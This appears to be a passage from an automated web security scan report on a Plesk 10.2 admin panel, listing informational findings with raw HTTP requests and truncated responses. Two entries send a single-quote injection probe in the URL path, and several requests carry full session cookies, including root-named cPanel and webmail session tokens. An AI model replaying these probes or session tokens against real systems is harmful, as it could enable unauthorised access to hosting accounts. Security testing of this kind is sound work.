12.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/list/reset-search/true/

Request

GET /admin/customer/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:15 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:15 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/domain/

Request

GET /admin/domain/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:36:22 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:36:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:36:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/domain/list

Request

GET /admin/domain/list?context=domains HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/?group=Services
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=health

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:01:23 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:01:24 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:01:24 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/

Request

GET /admin/health/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:32 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:33 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:33 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/index

Request

GET /admin/health/index HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:29 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:29 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/parameters/

Request

GET /admin/health/parameters/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:17 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/parameters/group/

Request

GET /admin/health/parameters/group/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:14 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:14 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/Services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/parameters/group/Services

Request

POST /admin/health/parameters/group/Services HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/?group=Services
Content-Length: 57
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=health
Pragma: no-cache
Cache-Control: no-cache

forgery_protection_token=ec0f0703e9cb33b7ca9a593a4276029b

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:03 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:03 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:03 GMT
Server: sw-cp-server
Content-Length: 64146

<script type="text/javascript">
//<![CDATA
Jsw.namespace('AdminPanel.Health');
AdminPanel.Health.Chart = {

   cache: $H(),

   paramOnClick: function(checkbox, paramId, elementId) {
var checkbox
...[SNIP]...

12.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/server-status/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/health/server-status/

Request

POST /admin/health/server-status/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Content-Length: 57
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Pragma: no-cache
Cache-Control: no-cache

forgery_protection_token=ec0f0703e9cb33b7ca9a593a4276029b

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:57:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:57:34 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:57:35 GMT
Server: sw-cp-server
Content-Length: 10847

<table id="health-group-992a0f0542384f1ee5ef51b7cf4ae6c4" class="t-collapsible t-collapsible-collapsed" width="100%" cellspacing="0">
<thead>
<tr>
<th class="t-collapsible-name
...[SNIP]...

12.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home

Request

GET /admin/home HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/

Request

GET /admin/home/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:24 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:24 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/admin

Request

GET /admin/home/admin HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:34:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:34:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:34:36 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin%27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/admin%27

Request

GET /admin/home/admin%27 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:59:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:59:03 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:59:03 GMT
Server: sw-cp-server
Content-Length: 1244


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin'  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/admin'

Request

GET /admin/home/admin' HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:37 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:37 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/home/reseller

Request

GET /admin/home/reseller HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 14:42:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:25 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:25 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller-self/

Request

GET /admin/reseller-self/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:34 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:34 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller-self/subscription-overview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller-self/subscription-overview/

Request

GET /admin/reseller-self/subscription-overview/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller
